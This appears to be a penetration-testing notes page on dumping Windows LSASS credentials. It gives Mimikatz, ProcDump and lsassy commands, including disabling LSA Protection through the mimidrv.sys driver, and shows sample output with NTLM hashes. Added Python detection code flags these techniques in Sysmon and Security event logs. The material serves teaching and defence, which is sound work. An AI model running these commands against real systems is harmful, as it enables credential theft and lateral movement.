LSASS
Local Security Authority Server Service (LSASS) is a Windows process that handles the operating system's security policy and enforces it on the system. It verifies logged-in accounts and manages passwords, hashes and Kerberos tickets.
Windows stores credentials in the LSASS process so that users can access network resources, such as file shares, SharePoint sites and other network services, without entering their credentials every time they connect.
Protected LSASS
Requires: Administrators
In 2012, Microsoft implemented LSA Protection to keep LSASS from being accessed to extract credentials from memory. The protection can be disabled with Mimikatz.
Mimikatz:
privilege::debug
:: If LSA Protection is enabled, the next command fails with an error
sekurlsa::logonpasswords
:: Load the mimidrv.sys driver, which works at kernel level, to disable LSA Protection
!+
:: Once the driver is loaded, remove the protection from the LSASS process
!processprotect /process:lsass.exe /remove

Output:
Privilege '20' OK
:: This error means that LSA Protection is enabled
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
[*] 'mimidrv' Service not Present
[+] 'mimidrv' Service Successfully Registered
[+] 'mimidrv' Service ACL to Everyone
[+] 'mimidrv' Service Started
Process : lsass.exe
PID 600 -> 00/00 [0-0-0]
Dumping LSASS Credentials
Requires: Administrators
LSASS is commonly abused to dump credentials in order to escalate privileges, steal data or move laterally. With administrator privileges we can dump the process memory of LSASS: Windows lets us create a dump file, a snapshot of a given process, either through desktop access (GUI) or from the command prompt.
Graphical User Interface (GUI)
Any running Windows process can be dumped using the GUI.
Windows Task Manager
- Click on the Details tab.
- Find the required process.
- Right-click it and select Create dump file.
Once the dump has finished, a pop-up message shows the path of the dumped file. The file can then be copied to our machine to extract NTLM hashes offline.
Sysinternals Suite
Requires: Sysinternals Suite must be installed on the system.
The dump process writes to disk. Dumping the LSASS process is a well-known adversary technique, so antivirus products may flag it as malicious.
We can dump a process with ProcDump, a Sysinternals process dump utility that runs from the command prompt.
procdump.exe -accepteula -ma lsass.exe "Dump Output Path"
Mimikatz
To get a user's hashes, that user (the victim) must have logged in to the system so that their credentials are cached.
We can use Mimikatz to extract the cached credentials from the memory of the lsass.exe process.
Mimikatz:
privilege::debug
:: Read LSASS memory and dump all cached passwords and hashes from the [lsass.exe] process
sekurlsa::logonpasswords

Output:
Authentication Id : 0 ; 798969 (00000000:000c30f9)
Session : RemoteInteractive from 2
User Name : Mark
Domain : PCDC
Logon Server : ADOBE-HARVEST
Logon Time : 2/28/2023 1:45:47 PM
SID : S-1-5-21-1966530601-3185510712-10604624-1114
msv :
[00000003] Primary
* Username : Mark
* Domain : PCDC
* NTLM : fc525c9683e8fe067095ba2ddc971889
* SHA1 : e53d7244aa8727f5789b01d8959141960aad5d22
* DPAPI : cd09e2e4f70ef660400b8358c52a46b8
tspkg :
wdigest :
* Username : Mark
* Domain : PCDC
* Password : (null)
kerberos :
* Username : Mark
* Domain : PCDC.GREEN
* Password : (null)
ssp :
credman
[...]
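From the defender's side, every technique in the two sections above (the Mimikatz driver that strips LSA Protection, the Task Manager and ProcDump dumps, and sekurlsa::logonpasswords reading LSASS directly) leaves the same trace: a handle opened on lsass.exe with memory-read rights, or a kernel driver being loaded. The following Python is an added example, not code from the original page or from any of the tools it describes. It scans Sysmon records in their "Field: value" message layout for ProcessAccess events (Event ID 10) that grant dump-capable rights on lsass.exe from an image outside an allowlist, and for DriverLoad events (Event ID 6) that load mimidrv.sys or any unsigned driver. The allowlist, the "Event ID" line (Sysmon carries it in the event header, not the message body) and the sample events are constructed for the example.

```python
"""Added detection example (not from the original page): flag Sysmon
ProcessAccess (10) records that open lsass.exe with memory rights from a
non-allowlisted image, and DriverLoad (6) records for mimidrv.sys or any
unsigned driver. Allowlist and sample events are constructed."""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Win32 PROCESS_* access rights that allow dumping or tampering with a process.
RIGHT_NAMES = {
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
}
# Any of these on lsass.exe is enough to dump its memory or inject into it;
# PROCESS_QUERY_* rights (0x0400, 0x1000) alone are harmless and are left out.
DANGEROUS = 0x0002 | 0x0008 | 0x0010 | 0x0020 | 0x0040

# Images that legitimately hold broad handles on LSASS (assumption: tune per estate).
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

@dataclass
class Alert:
    event_id: int
    image: str
    reason: str

def parse_event(text: str) -> Dict[str, str]:
    """Turn Sysmon's 'Field: value' message lines into a dict."""
    fields = {}
    for line in text.strip().splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def check_process_access(ev: Dict[str, str]) -> Optional[Alert]:
    """Event ID 10: non-allowlisted image opening lsass.exe with dump rights."""
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = ev.get("SourceImage", "")
    if source.lower() in ALLOWLIST:
        return None
    granted = int(ev.get("GrantedAccess", "0"), 16) & DANGEROUS
    if not granted:
        return None
    names = [n for bit, n in RIGHT_NAMES.items() if granted & bit]
    return Alert(10, source, "opened lsass.exe with " + ", ".join(names))

def check_driver_load(ev: Dict[str, str]) -> Optional[Alert]:
    """Event ID 6: the Mimikatz driver name, or any unsigned driver."""
    image = ev.get("ImageLoaded", "")
    if image.rsplit("\\", 1)[-1].lower() == "mimidrv.sys":
        return Alert(6, image, "driver name matches Mimikatz mimidrv.sys (weak: file can be renamed)")
    if ev.get("Signed", "").lower() == "false":
        return Alert(6, image, "unsigned kernel driver loaded")
    return None

def analyze(raw_events: List[str]) -> List[Alert]:
    """Run both checks over raw Sysmon message texts and collect the alerts."""
    alerts = []
    for text in raw_events:
        ev = parse_event(text)
        eid = ev.get("Event ID")
        alert = check_process_access(ev) if eid == "10" else check_driver_load(ev) if eid == "6" else None
        if alert:
            alerts.append(alert)
    return alerts

# Constructed sample events: ProcDump, a Task Manager "Create dump file",
# Defender and csrss (allowlisted), and the Mimikatz driver being loaded.
SAMPLE_EVENTS = [
    r"""Event ID: 10
SourceImage: C:\Tools\procdump.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1FFFFF""",
    r"""Event ID: 10
SourceImage: C:\Windows\System32\Taskmgr.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1410""",
    r"""Event ID: 10
SourceImage: C:\Program Files\Windows Defender\MsMpEng.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1400""",
    r"""Event ID: 10
SourceImage: C:\Windows\System32\csrss.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1FFFFF""",
    r"""Event ID: 6
ImageLoaded: C:\Tools\mimidrv.sys
Signed: false""",
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[Sysmon {a.event_id}] {a.image}: {a.reason}")
```

Sysmon only records ProcessAccess events that a rule in its configuration selects, so a rule with TargetImage lsass.exe is a prerequisite for the first check; the allowlist is the part that needs tuning, since security products and some system processes open LSASS with broad rights as a matter of course.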
Lsassy
Requires: NTLM hash or valid credentials
Lsassy is a Python tool to remotely extract credentials from a set of hosts. It uses the Impacket project to remotely read the necessary bytes of the lsass dump and pypykatz to extract the credentials.
lsassy -d "Domain" -u "Username" -p "Password" "Target IP" --users
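A remote dumper like the one described above reads the lsass dump over SMB, which the target's security log records as detailed file share access (Event ID 5145) when "Audit Detailed File Share" is enabled. The Python below is an added example, not part of the original page or of the Lsassy project. It groups 5145 records by source address and keeps only accesses to dump-like files on the administrative shares, separating writes (staging the dump) from reads (pulling it back). It assumes the dump is staged on ADMIN$ or C$, which the page does not state; the field labels are those of the 5145 message text, and the sample records are constructed.

```python
"""Added detection example (not from the original page): group Security
Event ID 5145 records to show which remote hosts wrote or read a process
dump through an administrative share. Assumption: the remote dumper stages
the lsass dump on ADMIN$ or C$; the sample records are constructed."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

FILE_READ_DATA = 0x1   # low bits of the 5145 Access Mask
FILE_WRITE_DATA = 0x2
ADMIN_SHARES = {r"\\*\admin$", r"\\*\c$"}
# A dump file: any .dmp, or any name mentioning lsass (catches renamed dumps).
DUMP_FILE = re.compile(r"\.dmp$|lsass", re.IGNORECASE)

def parse_event(text: str) -> Dict[str, str]:
    """Turn the 'Field: value' lines of an event's message into a dict."""
    fields = {}
    for line in text.strip().splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def classify_access(mask: int) -> str:
    """Reduce the access mask to the operations that matter for staging a dump."""
    ops = []
    if mask & FILE_WRITE_DATA:
        ops.append("write")
    if mask & FILE_READ_DATA:
        ops.append("read")
    return "+".join(ops) or "other"

def find_remote_dumps(raw_events: List[str]) -> Dict[str, List[Tuple[str, str, str]]]:
    """Map source address -> [(share, file, operation)] for dump-like files on admin shares."""
    hits = defaultdict(list)
    for text in raw_events:
        ev = parse_event(text)
        if ev.get("Event ID") != "5145":
            continue
        share = ev.get("Share Name", "").lower()
        target = ev.get("Relative Target Name", "")
        if share not in ADMIN_SHARES or not DUMP_FILE.search(target):
            continue
        mask = int(ev.get("Access Mask", "0"), 16)
        hits[ev.get("Source Address", "?")].append((share, target, classify_access(mask)))
    return dict(hits)

# Constructed sample records: one host stages and then reads back lsass.dmp
# via ADMIN$; the other accesses are ordinary file-share traffic.
SAMPLE_EVENTS = [
    r"""Event ID: 5145
Account Name: Administrator
Source Address: 10.0.0.5
Share Name: \\*\ADMIN$
Relative Target Name: Temp\lsass.dmp
Access Mask: 0x120116""",
    r"""Event ID: 5145
Account Name: Administrator
Source Address: 10.0.0.5
Share Name: \\*\ADMIN$
Relative Target Name: Temp\lsass.dmp
Access Mask: 0x120089""",
    r"""Event ID: 5145
Account Name: Mark
Source Address: 10.0.0.9
Share Name: \\*\Finance
Relative Target Name: Q1\report.docx
Access Mask: 0x120089""",
    r"""Event ID: 5145
Account Name: Administrator
Source Address: 10.0.0.5
Share Name: \\*\C$
Relative Target Name: Users\Mark\notes.txt
Access Mask: 0x120089""",
]

if __name__ == "__main__":
    for ip, accesses in find_remote_dumps(SAMPLE_EVENTS).items():
        for share, target, op in accesses:
            print(f"{ip} {op:5} {share}\\{target}")
```

A write followed by a read of the same dump file from one source address is the pattern to look for; a read alone can also be an administrator copying a crash dump, so the account name and the accompanying service-installation and logon events decide whether it is incident-worthy.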